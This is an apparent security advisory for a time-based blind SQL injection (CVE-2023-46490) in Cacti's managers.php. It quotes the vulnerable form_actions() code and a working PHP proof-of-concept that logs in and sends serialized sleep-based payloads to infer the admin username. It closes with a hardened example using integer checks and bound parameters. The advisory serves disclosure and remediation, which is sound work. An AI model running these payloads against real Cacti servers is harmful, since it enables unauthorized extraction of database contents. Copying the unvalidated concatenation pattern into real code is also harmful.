CVE-2023-46490

SQL Injection vulnerability in Cacti v1.2.25 allows a remote attacker to obtain sensitive information via the form_actions() function in the managers.php file.
Package: cacti
Affected versions: <=1.2.25
Patched versions: None

Summary

A SQL Injection vulnerability discovered in managers.php allowed authenticated users to access database information.

Details

SQL Injection vulnerability discovered in managers.php. In the function form_actions(), the request variable 'selected_items' (populated by unserializing 'selected_graphs_array') is joined into SQL statements without any validation of its elements.

Source code (excerpt of form_actions(); the remainder of the function is not reproduced in the advisory):

```php
function form_actions() {
    global $manager_actions, $manager_notification_actions;

    if (isset_request_var('selected_items')) {
        if (isset_request_var('action_receivers')) {
            // Attacker-controlled serialized array; its elements are never checked to be integers
            $selected_items = cacti_unserialize(stripslashes(get_nfilter_request_var('selected_graphs_array')));

            if ($selected_items != false) {
                if (get_nfilter_request_var('drp_action') == '1') { // delete
                    // Elements are concatenated straight into the IN (...) list
                    db_execute('DELETE FROM snmpagent_managers WHERE id IN (' . implode(',', $selected_items) . ')');
                    db_execute('DELETE FROM snmpagent_managers_notifications WHERE manager_id IN (' . implode(',', $selected_items) . ')');
                    db_execute('DELETE FROM snmpagent_notifications_log WHERE manager_id IN (' . implode(',', $selected_items) . ')');
                } elseif (get_nfilter_request_var('drp_action') == '2') { // enable
                    db_execute("UPDATE snmpagent_managers SET disabled = '' WHERE id IN (" . implode(',', $selected_items) . ')');
                } elseif (get_nfilter_request_var('drp_action') == '3') { // disable
                    db_execute("UPDATE snmpagent_managers SET disabled = 'on' WHERE id IN (" . implode(',', $selected_items) . ')');
                }

                header('Location: managers.php?header=false');
                exit;
            }
        }
    }
}
```

PoC

```php
<?php
$url = ["http://localhost/cacti/", "http://192.168.80.128/cacti/",];
$url = $url[1];
$username = 'admin';
$password = 'password';
$login = "index.php?action=login&login_username=$username&login_password=$password";
$injectSQLcode1 = serialize(["1 ) or if ('admin' = (SELECT username FROM user_auth WHERE id = 1 ), sleep(5), 0"]);
$injectSQLcode2 = serialize(["1 ) or if ('error' = (SELECT username FROM user_auth WHERE id = 1 ), sleep(5), 0"]);
$target = "managers.php?action=actions&selected_items=1&action_receivers=1&drp_action=1&selected_graphs_array=";

function curlPage($url, $cookie = false) {
    $curl = curl_init();
    curl_setopt($curl, CURLOPT_URL, $url);
    curl_setopt($curl, CURLOPT_HEADER, 1);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 60);
    curl_setopt($curl, CURLOPT_TIMEOUT, 60);
    if ($cookie) {
        curl_setopt($curl, CURLOPT_COOKIE, $cookie);
    }
    $data = curl_exec($curl);
    echo "[++Debug++] " . $url . "\n";
    curl_close($curl);
    return $data;
}

function getSQLinjectionPage() {
    global $url, $login, $target, $injectSQLcode1, $injectSQLcode2;
    //login
    $data1 = curlPage($url . $login);
    //echo $data1."\n";
    //get cookie
    $cookie = substr($data1, strpos($data1, 'Set-Cookie: ') + 12, 32);
    echo '[++Debug++] Cacti Cookie: ' . $cookie . "\n";
    //check login
    $data2 = curlPage($url . "index.php", $cookie);
    //echo substr($data2, 0, 300)."\n\n";
    //time of correct test
    $time1 = time();
    $data3 = curlPage($url . $target . urlencode($injectSQLcode1), $cookie);
    $time1 = time() - $time1;
    echo "[++result++] time of correct test: " . $time1 . "\n\n";
    //time of error test
    $time2 = time();
    $data3 = curlPage($url . $target . urlencode($injectSQLcode2), $cookie);
    $time2 = time() - $time2;
    echo "[++result++] time of error test: " . $time2 . "\n\n";
    if ($time2 <= 1 and $time1 >= 5) {
        echo "[++result++] Time difference exists, vulnerability exists!" . "\n\n";
    } else {
        echo "[++result++] No time difference, vulnerability does not exist" . "\n\n";
    }
}

//set ip, port, username, password, InjectCode first
getSQLinjectionPage();
```

Impact

Although the query result is not echoed back to the user, an authenticated user can infer MySQL database contents by measuring the response delay of the page (time-based blind SQL injection).
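The following is an added example, not Cacti's code and not the advisory's PoC: it shows the hardened form of the delete branch of form_actions() described above. Each unserialized element is checked to be a positive integer before any SQL is built, and the ids are then passed as bound parameters rather than concatenated with implode(). Table and column names follow the advisory; the function names sanitizeIdList() and deleteManagers(), the in-memory SQLite database and the sample rows are assumptions made so the example runs offline.

```php
<?php
// Added example (not Cacti's code): validate the id list, then bind ids as parameters.
// Assumption: a PDO SQLite in-memory database stands in for Cacti's MySQL backend.

function sanitizeIdList($selectedItems): array
{
    // Assumption: ids are positive integers. Anything else is rejected outright rather than
    // coerced, so an element such as "1 ) or sleep(5)" can never reach the SQL text.
    if (!is_array($selectedItems)) {
        throw new InvalidArgumentException('selected_items must be an array');
    }
    $ids = [];
    foreach ($selectedItems as $item) {
        // \z (not $) so a trailing newline cannot slip past the check
        if (!is_int($item) && !(is_string($item) && preg_match('/^[1-9][0-9]*\z/', $item))) {
            throw new InvalidArgumentException('non-numeric id rejected: ' . var_export($item, true));
        }
        $ids[] = (int) $item;
    }
    return $ids;
}

function deleteManagers(PDO $db, array $selectedItems): int
{
    $ids = sanitizeIdList($selectedItems);
    if ($ids === []) {
        return 0;
    }
    // One placeholder per id; the values travel as bound parameters, never as SQL text.
    $placeholders = implode(',', array_fill(0, count($ids), '?'));
    $tables = [
        'snmpagent_managers'               => 'id',
        'snmpagent_managers_notifications' => 'manager_id',
        'snmpagent_notifications_log'      => 'manager_id',
    ];
    $deleted = 0;
    foreach ($tables as $table => $column) {
        // $table and $column come from the fixed map above, not from the request
        $stmt = $db->prepare("DELETE FROM $table WHERE $column IN ($placeholders)");
        $stmt->execute($ids);
        $deleted += $stmt->rowCount();
    }
    return $deleted;
}

// --- demonstration with constructed data ---
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE snmpagent_managers (id INTEGER PRIMARY KEY, hostname TEXT)');
$db->exec('CREATE TABLE snmpagent_managers_notifications (manager_id INTEGER)');
$db->exec('CREATE TABLE snmpagent_notifications_log (manager_id INTEGER)');
$db->exec("INSERT INTO snmpagent_managers VALUES (1, 'a'), (2, 'b'), (3, 'c')");
$db->exec('INSERT INTO snmpagent_managers_notifications VALUES (1), (2)');

// Same shape the advisory describes: a serialized array arriving in the request (constructed).
$benign = unserialize(serialize(['2', '3']));
echo "legitimate request removed " . deleteManagers($db, $benign) . " rows\n";

// Injection-shaped element (constructed): rejected before any statement is prepared.
$hostile = unserialize(serialize(["1 ) or if ('x' = (SELECT 'x'), sleep(5), 0"]));
try {
    deleteManagers($db, $hostile);
} catch (InvalidArgumentException $e) {
    echo "rejected: " . $e->getMessage() . "\n";
}
echo "rows left in snmpagent_managers: "
    . $db->query('SELECT COUNT(*) FROM snmpagent_managers')->fetchColumn() . "\n";
```

The two controls are independent and both are worth keeping: the integer check alone would already defeat the payload in the PoC, and parameter binding alone would turn the payload into a harmless literal, so either one failing still leaves the other. The same placeholder-plus-parameters pair can be handed to an application's own prepared-statement helper (Cacti ships db_execute_prepared() for this) in place of the PDO calls used here.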